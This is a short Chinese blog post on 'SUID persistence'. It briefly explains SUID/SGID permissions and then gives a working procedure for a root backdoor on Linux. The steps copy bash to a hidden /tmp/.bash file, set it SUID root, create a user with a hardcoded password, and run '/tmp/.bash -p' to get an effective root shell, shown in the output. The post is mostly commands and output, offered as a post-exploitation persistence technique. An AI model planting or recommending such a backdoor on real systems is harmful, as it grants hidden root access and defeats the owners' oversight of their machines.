SUID权限维持
SUID介绍
SUID是一种特殊权限,设置了suid的程序文件,在用户执行该程序时,用户的权限是该程序文件属主的权限,例如 程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的权限。sgid与suid类似,只是执行程序时 获得的是文件属组的权限。passwd这个命令程序的权限设置,它就是设置了suid权限的
注意以下几点:
1. 只有可以执行的二进制程序文件才能设定SUID权限,非二进制文件设置SUID权限没任何意义.
2. 命令执行者要对该程序文件拥有执行(x)权限.
3. 命令执行者在执行该程序时获得该程序文件属主的身份.
4. SUID权限只在该程序执行过程中有效,也就是说身份改变只在程序执行过程中有效
SUID维持
1、找到bash文件
[root@localhost ~]# whereis bash
bash: /usr/bin/bash /usr/share/man/man1/bash.1.gz
[root@localhost ~]#
因为我是centos所以在/usr/bin/bash
2、复制到普通用户环境能接触的文件夹
[root@localhost ~]# cp /bin/bash /tmp/.bash
[root@localhost ~]# ls /tmp/ -a
. .. .bash .font-unix .ICE-unix .Test-unix .X11-unix .XIM-unix
[root@localhost ~]#
3、设置权限
[root@localhost ~]# chmod 4755 /tmp/.bash
[root@localhost ~]# chmod +s /tmp/.bash
4、创建一个普通用户jack
useradd -p `openssl passwd -1 -salt 'salt' 123456` jack
5、使用jack用户登录
6、运行/tmp/.bash
[jack@localhost ~]$ /tmp/.bash -p
.bash-4.2# id
uid=1000(jack) gid=1000(jack) euid=0(root) egid=0(root) groups=0(root),1000(jack)
.bash-4.2# whoami
root
.bash-4.2#
© 版权声明
本站所有内容(包括但不限于文字、图片、视频等)均受到版权法保护,归作者所有,未经授权不得转载、复制或用于其他任何商业目的。
转载请注明出处,并保留原文链接。对于未经授权的使用,我们将保留追究法律责任的权利。
THE END
暂无评论内容